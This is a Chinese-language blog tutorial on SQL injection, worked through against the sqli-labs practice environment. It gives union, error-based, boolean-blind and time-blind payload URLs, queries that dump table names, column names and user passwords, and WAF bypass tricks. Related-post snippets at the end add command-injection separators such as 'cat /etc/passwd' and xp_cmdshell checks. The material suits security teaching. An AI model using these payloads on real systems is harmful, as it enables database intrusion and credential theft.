sql注入

最新推荐文章于 2022-03-01 14:39:14 发布
最新推荐文章于 2022-03-01 14:39:14 发布
阅读量236 收藏 1
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43727668/article/details/101708275
版权

sql注入

sql注入:在web界面上寻找可以与后台数据库交互的地方,通过一系列的手段,入侵数据库从而找到想要的数据。
**

sql注入的顺序

sql注入的顺序:1,寻找交互点2,构造闭合3,查看列数4,查看显示位5,查看数据库名6,查看表名7,查看列名8,查看用户名和密码。

  • 寻找交互点

交互点一般分为两种一种是get即在网址栏进行交互,另一种post即在username或password后面的输入框进行交互。

  • 构造闭合

所谓闭合就是指在程序员在写后台文件时对ID的引用。
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";//这句话的闭合方式为” ’ “
通常情况下程序员使用的闭合方式有’,",),"),’),)’,)"。

  • 查看列数

查看列数的作用在于指导我们进行后续的操作。
通常使用order by来判断

  • 查看显示位

有些wed页面可能会有数据显示出来,也可能不会显示但是会出现错误的界面,甚至有的界面只会显示对错两种界面,更甚至只显示一种界面。
对于第一种 我们可以使用联合查询,让前面的数据错误,输出后面的数据从而判断显示位。

http://192.168.100.4/sqli-labs-master/Less-1/?id=-1' union all select 1,2,3 --+

对于第二种 我们可以使用一些特殊的函数让其显示错误界面但是其中包含一些正确的信息。
http://192.168.100.4/sqli-labs-master/Less-1/?id=-4' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1 --+ --+
对于第三种 我们可以使用布尔型盲注,可以通过length()返回字符串的长度,substr()截取字符串,mid去出字符串的一部分值。取出字符后使用二分法和ascall码来对照从而判断具体是哪个字符。

http://192.168.100.4/sqli-labs-master/Less-8/?id=4' and length(database())%3E1 --+

对于第四种可以使用sleep()函数,通过延迟来判断对错与否

http://192.168.100.4/sqli-labs-master/Less-9/?id=1%E2%80%98 and if((length(database()%3E7),sleep(4),1) --+
  • 查看数据库名

可以使用database()函数来查看

  • 查看表名

所有的 表名都存在于information_schema.tables中通过表就可以查看表名

http://192.168.100.4/sqli-labs-master/Less-1/?id=-1' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=  "security  "--+
  • 查看列名

所有的 列名都存在于information_schema.columns中通过表就可以查看列名

http://192.168.100.4/sqli-labs-master/Less-1/?id=-1' union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema=  "security  " and table_name=  "users  "--+
  • 找到用户名和密码就可以直接登录
http://192.168.100.4/sqli-labs-master/Less-1/?id=-1' union all select 1,group_concat(username),group_concat(password) from users --+

sql注入绕过

  1. 大小写混合

大小写绕过用于只针对小写或大写的关键字匹配技术正则表达式/express/i 匹配时大小写不敏感便无法绕过这是最简单的绕过技术 id=-15 uNIoN sELecT 1,2,3,4

  1. 嵌套关键字

这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过 `id=-15 UNIunionON SELselectECT 1,2,3,4 替换关键字同样是很基础的技术也可以构造得更复杂SeLSeselectleCTecT关键要看正则表达式会进行几次匹配处理了

  1. 使用编码

在浏览器中输入一个链接非保留字的字符浏览器会对其URL编码如空格变为%20、单引号%27、左括号%28、右括号%29 普通的URL编码可能无法实现绕过不过存在某种情况URL编码只进行了一次解码过滤可以用两次编码绕过
%0a,%0b,%0c,%0d,%20,%09,%a0,这些都是可以代替空格去绕过waf
tab键的URL编码为%09
换行符的URL编码为%0a
%0b,%0c,%a0可以用来代替空格,但不是其他值经URL编码可得的
回车符的URL编码为%0d
space的URL编码为%20

  1. 使用注释

看一下常见的用于注释的符号有哪些 //, – , /**/, #, --+,-- -, ;–a

莫伤心
关注
专栏目录
Sql 注入
瞎几把学
06-06 469
xp_cmdshell这个模块给删除了需要上传xplog70.dll这个文件一、xp_cmdshell的删除及恢复1、判断xp_cmdshell是否存在and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)select count(*) from master.dbo
SQL注入
extremecold
09-02 547
回显注入
%20 %09 %0a
东隅的博客
03-01 1万+
按我的想法,%09用于语句中间,%0a可以做语句末尾的截断,此外 || &&(要进行url编码成%26%26)这两种也是可以进行末尾的截断的
%0a php,%0a(换行符)的执行解析过程
weixin_29801567的博客
03-31 1393
test.php文件的代码如下://var a = "";//var a = "start_%0a_end";情况1:变量a的值是可控的,由参数input决定,所以,当从浏览器访问:http://127.0.0.1/test.php?input=start_%0a_end的时候查看网页源代码,结果如下://省略……//var a = start__end;//var a = "start_%0a_...
SQL注入绕过技巧
whj_study的博客
12-18 2762
1.绕过空格(注释符/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,3 select * from users where id=8.0 select 1,2,3 2.括号绕过空格:   如..
[CTF技巧]命令注入绕过总结
3tefanie丶zhou的博客
07-08 3623
命令分隔符 cat /etc/passwd;ls 分号 ; cmd1;cmd2(多条语句顺序执行) cat /etc/passwd && ls and && cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cat etc || ls or || cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2 管道符 | | 管道符 管道符”|“
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
12-29
SQL注入是一种严重的安全威胁,它允许攻击者通过在应用程序的输入字段中插入恶意SQL代码来执行未经授权的数据库操作。攻击者通常寻找没有适当验证和过滤的用户输入,然后利用这些漏洞来构造能改变原始SQL语句意图的...
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
%0a可以做什么
weixin_30314631的博客
06-29 690
以通过这个正则表达式但是带入一个%0a,那么很好,漏洞就回到一个%0a能做什么上来了!黑锅已经总结了一个,在文件扩展后缀里1.php.jpg不能执行但是1.php.jpg%0a就可以了(linux环境下)另外如果在写文件的时候%0a就是一个新行了,对于数据库为文本的就是一个新记录还有呢?数据库在对待1和1%a的时候是不一样的,1%a被更新到一个int类型的字段可能会导致溢出...
前端encodeURI , decodeURI对字符串编码解码 , 以及把url中的%0A %20解码成换行和空格
热门推荐
weixin_49577940的博客
11-18 1万+
一 , 对字符串进行编码 var str = "岁月不居,时节如流" console.log(str); str = encodeURI(str) console.log("====编码之后===="); console.log(str); 控制台打印 二 ,对字符串进行解码 var str = "%E5%B2%81%E6%9C%88%E4%B8%8D%E5%B1%85%EF%BC%8C%E6%97%B6%E8%8A%82%E5%A6%...
asp %0D%0A换行问题
东亮博客
07-09 5459
Function SecTrim(s1)  SecTrim = Replace(Trim(s1),Chr(13)&Chr(10),"")  End Function
WEB安全之系统命令执行漏洞
qq_56158055的博客
01-09 3352
常用的系统命令执行函数 system() #输出并返回最后一行shell结果。 exec() #不输出结果,返回最后一行shell结果,所有结果保存到一个返回数组里。 passthru() #只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。 popen()、proc_open() #不会直接返回执行结果,而是返回一个文件指针 shell_exec()#通过shell执行命令并以字符串的形式返回完整的输出 ` `(反引号) #实际上是使用shell_exec()函数 pc...
命令执行技巧
weixin_52387684的博客
11-30 3313
命令执行将执行系统命令,因此利用Linux shell中的特性,从而达到绕过防御的效果 测试代码: <?php highlight_file(__FILE__); $name = $_GET['name']; $output=shell_exec('echo'.$name); echo $output; ?> Linux shell中分隔符 换行符(%0a)、回车符(%0d)、连续命令(;)、管道符(|)、逻辑符号(||、&&) 注意:在使用.
考研复习-英语二真题考试题集-带答案
最新发布
09-14
英语二考研真题复习资料,带答案版
SQL注入攻防深度解析
"SQL注入天书是一份详尽介绍SQL注入技术的资料,涵盖了从基础到高级的ASP注入方法和技巧,适合不同水平的读者学习。" SQL注入是一种常见的网络安全漏洞,发生在Web应用程序未能充分验证和清理用户输入时。当用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值